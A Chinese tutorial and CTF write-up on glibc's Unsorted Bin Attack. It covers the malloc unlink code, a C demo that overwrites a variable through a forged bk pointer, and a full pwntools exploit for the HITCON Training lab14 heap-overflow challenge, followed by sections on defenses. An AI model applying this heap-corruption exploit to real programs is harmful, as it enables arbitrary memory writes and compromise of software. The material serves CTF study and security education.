好好说话之Unsorted Bin Attack:从原理到实战CTF漏洞利用

李_涛

1. Unsorted Bin Attack基础原理

Unsorted Bin Attack是一种针对glibc内存管理机制的漏洞利用技术。要理解这个攻击手法,我们得先了解glibc中unsorted bin的基本工作原理。

unsorted bin在glibc的内存管理体系中扮演着缓冲区的角色。当程序释放一个不属于fast bin大小的chunk时,这个chunk首先会被放入unsorted bin中。与fast bin和small bin不同,unsorted bin是一个双向链表,而且其中的chunk不会按照大小排序。

unsorted bin的关键特性包括:

  • 采用FIFO(先进先出)机制
  • 每个chunk都包含fd(forward pointer)和bk(backward pointer)两个指针
  • 当malloc时无法在fast bin和small bin中找到合适大小的chunk时,会遍历unsorted bin

攻击的核心在于利用_int_malloc函数中对unsorted bin的操作代码。具体来说,当从unsorted bin中取出一个chunk时,会执行以下关键操作:

c复制unsorted_chunks(av)->bk = bck;
bck->fd = unsorted_chunks(av);

这两行代码实际上是在维护双向链表的完整性。如果我们能够控制某个chunk的bk指针,就能实现任意地址写入一个较大的值(通常是unsorted bin的地址)。

2. 关键代码分析

让我们深入分析_int_malloc中与unsorted bin相关的关键代码片段。理解这些代码是成功利用漏洞的基础。

在malloc.c的_int_malloc函数中,处理unsorted bin的部分有几个关键点需要注意。首先是检查chunk完整性的代码:

c复制if (__glibc_unlikely (bck->fd != victim))
    malloc_printerr("malloc(): corrupted unsorted chunks 3");

这个检查确保了双向链表的完整性。如果我们要修改bk指针,必须确保这个检查能够通过。

接下来是实际修改指针的代码:

c复制unsorted_chunks(av)->bk = bck;
bck->fd = unsorted_chunks(av);

这两行代码的执行效果是:

  1. 将unsorted bin的bk指针指向我们控制的bck
  2. 将bck->fd指向unsorted bin的头节点

如果我们能够控制bck(即victim chunk的bk指针),就能实现向任意地址写入unsorted bin头节点的地址。

3. 实战演示:简单示例

为了更好地理解,我们来看一个简化的示例程序。这个程序演示了如何通过控制bk指针来修改目标变量的值。

c复制#include <stdio.h>
#include <stdlib.h>

int main() {
    unsigned long target_var = 0;
    printf("&target_var = %p, value = %lu\n", &target_var, target_var);
    
    unsigned long *p = malloc(400);
    malloc(500); // 防止合并到top chunk
    
    free(p);
    
    // 修改p的bk指针
    p[1] = (unsigned long)(&target_var - 2);
    
    malloc(400); // 触发unsorted bin attack
    
    printf("After attack: &target_var = %p, value = %lu\n", 
           &target_var, target_var);
    return 0;
}

这个程序的执行流程如下:

  1. 分配两个chunk,第二个chunk防止第一个chunk被释放时合并到top chunk
  2. 释放第一个chunk,它会被放入unsorted bin
  3. 修改释放的chunk的bk指针,指向目标地址-0x10的位置
  4. 再次分配相同大小的chunk,触发unsorted bin操作
  5. 目标变量的值被修改为unsorted bin的地址

为什么是target_var-2?因为在glibc的实现中,bk指针指向的是下一个chunk的头部,而我们需要伪造一个chunk结构。对于64位系统,chunk头的大小是0x10字节。

4. CTF实战:HITCON Training lab14

现在我们来分析一个真实的CTF题目 - HITCON Training lab14,展示如何利用Unsorted Bin Attack获取flag。

4.1 题目分析

首先检查程序的基本信息:

  • 64位程序
  • 关闭了PIE(地址随机化)
  • 有create、edit、delete功能

关键点在于程序中有一个magic全局变量,当它的值大于4869(0x1305)时,会调用system("cat flag")。

4.2 漏洞点

程序存在以下问题:

  1. edit功能中,可以输入比原始size更大的内容,导致堆溢出
  2. delete功能正确释放内存,没有UAF漏洞

我们的目标是利用堆溢出修改某个chunk的bk指针,然后通过Unsorted Bin Attack修改magic变量的值。

4.3 利用步骤

具体利用步骤如下:

  1. 创建三个chunk:

    • chunk0:小chunk(0x20),用于溢出
    • chunk1:较大的chunk(0x80),将被释放到unsorted bin
    • chunk2:小chunk(0x20),防止chunk1与top chunk合并
  2. 释放chunk1,它会被放入unsorted bin

  3. 通过chunk0溢出,修改chunk1的bk指针,指向magic-0x10

  4. 再次申请一个0x80大小的chunk,触发unsorted bin attack

  5. magic变量被修改为unsorted bin的地址(一个很大的值)

  6. 触发magic检查,获取flag

4.4 完整利用代码

python复制from pwn import *

context.log_level = 'debug'

def create(size, content):
    p.sendlineafter(':', '1')
    p.sendlineafter(':', str(size))
    p.sendafter(':', content)

def edit(idx, size, content):
    p.sendlineafter(':', '2')
    p.sendlineafter(':', str(idx))
    p.sendlineafter(':', str(size))
    p.sendafter(':', content)

def delete(idx):
    p.sendlineafter(':', '3')
    p.sendlineafter(':', str(idx))

p = process('./heapcreator')

# 创建三个chunk
create(0x20, 'A'*0x20)       # chunk0
create(0x80, 'B'*0x80)       # chunk1
create(0x20, 'C'*0x20)       # chunk2

# 释放chunk1到unsorted bin
delete(1)

# 准备fake chunk
magic = 0x6020c0
fake_chunk = magic - 0x10

# 通过chunk0溢出修改chunk1的bk指针
payload = 'A'*0x20           # 填充chunk0
payload += p64(0)            # chunk1的prev_size
payload += p64(0x91)         # chunk1的size
payload += p64(0)            # chunk1的fd
payload += p64(fake_chunk)   # chunk1的bk

edit(0, len(payload), payload)

# 触发unsorted bin attack
create(0x80, 'D'*0x80)

# 触发magic检查
p.sendlineafter(':', '4869')

p.interactive()

5. 防御与检测

了解攻击手法后,我们也要知道如何防御这类漏洞。glibc已经采取了一些措施:

  1. 完整性检查:
c复制if (__glibc_unlikely (bck->fd != victim))
    malloc_printerr("malloc(): corrupted unsorted chunks 3");
  1. 最新版glibc增加了更多的安全检查

开发者可以采取以下预防措施:

  • 及时更新glibc版本
  • 避免使用不安全的堆操作
  • 使用Address Sanitizer等工具检测内存错误

在CTF比赛中,出题者可以通过以下方式增加难度:

  • 开启PIE(地址随机化)
  • 使用最新版glibc
  • 限制堆操作的大小和次数

6. 实际应用中的挑战

虽然在CTF中Unsorted Bin Attack是一个常见的考点,但在实际漏洞利用中会遇到更多挑战:

  1. 需要信息泄露:通常需要先泄露堆地址或libc地址
  2. 现代glibc版本增加了更多保护措施
  3. 需要精确控制堆布局
  4. 多线程环境下的竞争条件

一个实际的利用流程可能包括:

  1. 通过堆溢出或UAF实现信息泄露
  2. 泄露libc地址和堆地址
  3. 精心构造堆布局
  4. 实施Unsorted Bin Attack
  5. 可能需要结合其他技术如FSOP(File Stream Oriented Programming)

7. 扩展思考

Unsorted Bin Attack虽然强大,但也有其局限性。它只能写入一个较大的值(通常是unsorted bin的地址),不能精确控制写入的内容。在实际利用中,我们通常需要结合其他技术:

  1. 结合fastbin attack实现更灵活的写操作
  2. 使用House of系列技巧绕过各种保护
  3. 结合ROP或JOP实现代码执行

理解这些底层机制不仅对CTF比赛有帮助,对日常开发中的内存管理、性能优化也有重要意义。比如,了解glibc的内存分配策略可以帮助我们优化程序的内存使用效率。

在分析这类漏洞时,使用gdb配合pwndbg等插件非常有用。一些常用的命令包括:

  • heap:查看堆状态
  • bins:查看各种bin的状态
  • telescope:查看内存内容

最后要强调的是,这些技术应该仅用于合法授权的安全研究和CTF比赛。在实际开发中,我们应该遵循安全编程实践,避免引入这类漏洞。

内容推荐

8086微处理器:从BIU与EU的协同到现代CPU架构的基石
本文深入解析8086微处理器的革命性设计,重点探讨BIU与EU的协同工作机制及其对现代CPU架构的影响。通过分析8086的双核架构、指令预取机制和总线周期优化,揭示其如何奠定现代处理器的基础设计理念,包括流水线技术、缓存体系和并行计算。
给程序员讲线性代数:用NumPy和几何动画理解基底与线性变换
本文从程序员视角解析线性代数的核心概念,通过NumPy实现和几何动画演示基底变换与线性变换的工程应用。详细讲解如何用代码实现坐标架变换、图形变形及逆矩阵操作,揭示行列式在空间变换中的实际意义,并探讨游戏引擎和性能优化中的实用技巧,帮助开发者将抽象数学转化为可视化解决方案。
用K230开发板给AI模型拍训练集照片:一个物理按键搞定数据采集
本文详细介绍了如何利用K230开发板构建智能数据采集系统,通过物理按键一键完成AI模型训练数据集的拍摄。从硬件配置到软件实现,再到数据质量控制,提供了完整的解决方案,特别适合个人开发者和教育场景使用。
【Mermaid】从零开始:手把手教你用代码绘制专业流程图
本文详细介绍了如何使用Mermaid代码绘制专业流程图,从基础语法到实战技巧全面解析。Mermaid作为一种基于文本的图表生成工具,具有版本控制友好、修改成本低和跨平台兼容等优势,特别适合技术文档和项目设计。文章包含5分钟快速上手指南、实战案例和高级技巧,帮助读者高效掌握这一强大工具。
性能飙升60%!手把手教你用Tool.Net 3.0.0的TcpFrame构建高性能字节流服务
本文详细介绍了如何使用Tool.Net 3.0.0的TcpFrame模块构建高性能字节流服务,实现60%的性能提升。通过协议栈重构、内存管理优化和智能心跳机制,Tool.Net显著提升了数据传输效率,适用于实时通信和物联网场景。文章还提供了实战示例和进阶调优技巧,帮助开发者快速掌握这一技术。
超越基础配置:SAP QM主检验特性(MIC)的三种‘模型’实战解析(Copy/Reference/Incomplete)
本文深入解析SAP QM主检验特性(MIC)的三种模型(Copy/Reference/Incomplete Copy)及其在质量管理中的实战应用。通过对比不同模型的数据同步机制和修改权限,帮助企业在QS21中合理配置检验特性,确保质量数据的准确性和合规性,特别适用于乳制品、制药和汽车零部件等行业。
MCP2515调试笔记----SPI时序与CS引脚操作要点
本文详细解析了MCP2515调试中的SPI时序与CS引脚操作要点,揭示了初始化过程中的常见陷阱及解决方案。通过硬件设计建议、软件优化方案和完整初始化流程示例,帮助工程师避免通信失败,提升MCP2515的稳定性和可靠性。
跨平台文件同步利器:Beyond Compare实战指南
本文详细介绍了跨平台文件同步工具Beyond Compare的实战应用,涵盖安装配置、核心比较模式、远程服务器连接及自动化脚本等高级功能。通过具体案例展示如何提升文件同步效率300%,特别适合开发者和团队协作场景,有效避免手动同步导致的错误。
YOLOv8 Detect Head 核心机制:从特征图到预测框的完整解码
本文深入解析了YOLOv8 Detect Head的核心机制,详细介绍了从多尺度特征图到预测框的完整解码过程。重点探讨了特征整合、位置预测和类别判断三大任务,以及Anchor-Free网格点生成、DFL边界框解码等关键技术,帮助开发者深入理解YOLOv8物体检测的实现原理。
PX4从入门到实战(三):外部控制与指令系统深度解析
本文深入解析PX4飞控系统的外部控制与指令系统,重点介绍OFFBOARD模式的核心原理与实战应用。通过详细代码示例,展示如何实现位置控制、轨迹跟踪及COMMAND接口的全面应用,帮助开发者掌握PX4的高级控制功能,提升无人机开发效率。
别再让PD图吃灰了!手把手教你用Python实现持续同调矢量化(附代码)
本文详细介绍了如何利用Python将持续同调图(PD)转化为机器学习模型可用的特征向量,涵盖五大矢量化方法:持续性图像(PI)、持续性景观(PL)、持续同调熵(PE)、贝蒂曲线和加权轮廓。通过实战代码和性能对比,帮助读者高效处理拓扑数据,提升模型表现。
深入OpenSfM的config.yaml:调参实战指南,让你的3D重建效果提升一个档次
本文深入解析OpenSfM的config.yaml配置文件,提供从特征提取到BA优化的全流程调参实战指南。通过场景化参数调整策略,帮助用户解决3D重建中的点云稀疏、模型断裂等问题,显著提升重建质量和效率。特别针对建筑、小物体等不同场景,给出具体参数优化方案。
ASN.1编码规则解析:从BER到XER的演进与应用
本文深入解析ASN.1编码规则,从基础的BER到高效的PER再到可读性强的XER,详细介绍了各种编码规则的特点、应用场景及实际开发经验。文章通过具体案例展示了不同编码规则在网络协议、金融交易、物联网等领域的应用,帮助开发者根据需求选择合适的编码方式,提升系统性能和兼容性。
告别卡顿!用Vue 3的transition实现一个丝滑的移动端跑马灯组件
本文介绍如何利用Vue 3的transition特性实现一个高性能的移动端跑马灯组件,解决传统setInterval方案导致的卡顿问题。通过动态文本宽度适配、CSS硬件加速和内存泄漏防护等优化技巧,确保动画在低端设备上也能丝滑流畅运行。
PyJWT Subject Must Be a String: Debugging Authentication Errors in Python APIs
本文详细解析了Python API中常见的JWT认证错误'Subject must be a string',深入探讨了PyJWT库对subject字段的严格类型检查机制。通过实际案例展示了如何调试和修复Flask-JWT-Extended中的类型不匹配问题,并提供了不同数据库环境下的解决方案和防御性编程实践,帮助开发者避免类似认证错误。
优雅处理JSON反序列化:空字符串到空集合的转换策略
本文详细探讨了JSON反序列化过程中空字符串到空集合的转换策略,重点介绍了如何使用Jackson自定义反序列化器优雅处理这一常见问题。通过实现EmptyStringListDeserializer类,开发者可以灵活应对前端传递空字符串的场景,同时确保类型安全。文章还提供了多种优化方案和测试用例,帮助开发者选择最适合项目的解决方案。
SolidWorks机械臂模型转STL导入Matlab保姆级教程(含Robotics Toolbox代码)
本文提供SolidWorks机械臂模型转STL并导入Matlab的完整教程,涵盖模型预处理、STL导出参数设置、Robotics Toolbox初始化及可视化渲染等关键步骤。特别针对机械臂运动学仿真中的坐标系对齐、模型缩放等问题提供解决方案,帮助研究者高效实现3D模型在Matlab环境中的精准导入与应用。
Qt横向流式布局实战:从官方Demo到自定义增强,打造灵活UI的2种核心方案
本文深入探讨了Qt横向流式布局的两种核心实现方案:QListView方案和自定义FlowLayout方案,并对比了它们的优缺点。通过官方Demo解析和自定义增强接口实战,帮助开发者打造灵活、高效的UI布局,特别适用于标签云、工具箱等动态排列场景。
VSCode调试C++程序时,那个烦人的‘gdb32.exe’错误到底怎么破?
本文详细解析了VSCode调试C++程序时常见的'gdb32.exe'错误,提供了从快速修复到专业配置的多重解决方案。通过分析GDB版本兼容性问题、优化launch.json配置及环境变量管理,帮助开发者彻底解决这一典型问题,提升调试效率。特别适用于使用MinGW-W64和GCC工具链的C++开发者。
从仿真到联动:手把手教你用MoveIt和Gazebo搭建机械臂闭环仿真环境
本文详细介绍了如何使用MoveIt和Gazebo搭建机械臂闭环仿真环境,涵盖环境准备、控制器配置、启动文件整合及高级调试技巧。通过ROS平台实现RViz与Gazebo的联动,帮助开发者验证机械臂控制算法在物理仿真中的表现,提升开发效率并降低硬件测试风险。
已经到底了哦
精选内容
热门内容
最新内容
Linux服务器频繁报soft lockup?这10种硬件和配置问题你排查了吗
本文详细解析了Linux服务器频繁报soft lockup的10种硬件和配置问题排查方法,包括电源系统、CPU与散热系统、内存子系统等关键部件的检测与优化。通过专业工具和实用技巧,帮助硬件工程师和系统运维人员快速定位并解决kernel:NMI watchdog触发的CPU异常问题,提升服务器稳定性。
Valgrind工具在嵌入式开发中的交叉编译实践与性能优化策略
本文详细介绍了Valgrind工具在嵌入式开发中的交叉编译实践与性能优化策略。通过ARM架构下的交叉编译实战,解决glibc符号问题,并提供编译期和运行时的优化参数,显著提升工具在资源受限环境中的效率。文章还分享了嵌入式场景下的诊断技巧和高级内存问题定位方法,帮助开发者更高效地使用Valgrind进行内存调试和性能优化。
RS485电路设计实战:从模块解析到工业场景可靠性保障
本文深入探讨了RS485电路设计在工业自动化领域的实战应用,从模块解析到工业场景可靠性保障。通过分析电磁兼容性、环境应力等工业特殊因素,详细介绍了信号隔离、ESD保护等核心电路设计要点,并提供了长距离传输、多节点网络优化等解决方案,助力工程师实现高可靠性的工业通讯系统。
零成本搞定日语视频字幕:从识别、处理到翻译的全链路实践
本文详细介绍了一套零成本制作日语视频字幕的全链路方案,涵盖语音识别、字幕优化和翻译三个核心环节。通过autosub、SrtEdit和字幕组机翻小助手等免费工具的组合使用,即使没有编程基础的用户也能轻松完成从日语识别到中文字幕生成的全流程,处理一小时视频仅需20-30分钟。
Android TV一键播放功能实战:HDMI-CEC底层实现与避坑指南
本文深入解析Android TV中HDMI-CEC协议的底层实现与一键播放功能开发实战。从HdmiControlService框架层到HAL硬件抽象层,详细剖析跨设备兼容性解决方案,并提供MTK平台特殊处理、多设备兼容性矩阵等实用技巧,帮助开发者规避常见陷阱,优化CEC响应性能。
从原理到实战:LCMV与GSC波束形成算法对比及MATLAB仿真全解析
本文深入解析了LCMV与GSC两种波束形成算法的原理、MATLAB实现及工程应用对比。通过详细的数学推导和仿真示例,展示了LCMV在多约束场景下的精确控制能力,以及GSC在实时自适应处理中的优势。针对算法选择、性能优化和工程实践中的常见问题提供了实用解决方案,为信号处理工程师提供了宝贵的参考指南。
从零搭建一辆ROS小车(四)激光雷达SLAM实战:Hector与Gmapping对比
本文详细对比了Hector与Gmapping两种激光雷达SLAM算法在ROS小车建图中的应用。Hector_mapping以零配置快速建图见长,适合资源有限或手持建图场景;而slam_gmapping则依赖里程计但精度更高,适合精细建图需求。通过实战参数配置和RPLIDAR实测数据,为开发者提供算法选型建议和优化技巧。
内网环境K8s部署Harbor避坑指南:从Helm Chart下载到Ceph S3存储配置全流程
本文详细介绍了在内网Kubernetes环境中部署Harbor镜像仓库的全流程,包括Helm Chart离线安装、Ceph S3存储配置等关键步骤。针对金融行业核心系统容器化改造场景,提供了从资源筹备到高可用架构设计的实战经验,帮助用户规避常见部署陷阱,实现稳定高效的企业级镜像管理。
Linux设备文件传输新思路:巧用telnet登录与busybox ftpget/ftpput
本文介绍了在Linux设备上通过telnet登录结合busybox的ftpget/ftpput工具实现高效文件传输的创新方法。针对嵌入式系统资源有限、网络环境封闭等场景,详细讲解了从telnet连接到文件上传下载的完整流程,包括实用技巧、常见问题解决方案及安全注意事项,为远程文件传输提供了轻量级替代方案。
ESP32-S3与ST7789屏幕的完美结合:1.3寸屏驱动实战指南
本文详细介绍了ESP32-S3与ST7789屏幕的硬件搭配与驱动开发实战指南。通过SPI通信优化、开发环境搭建避坑、TFT_eSPI库深度配置等技巧,帮助开发者快速实现1.3寸屏的高效驱动,适用于智能穿戴、便携设备等场景。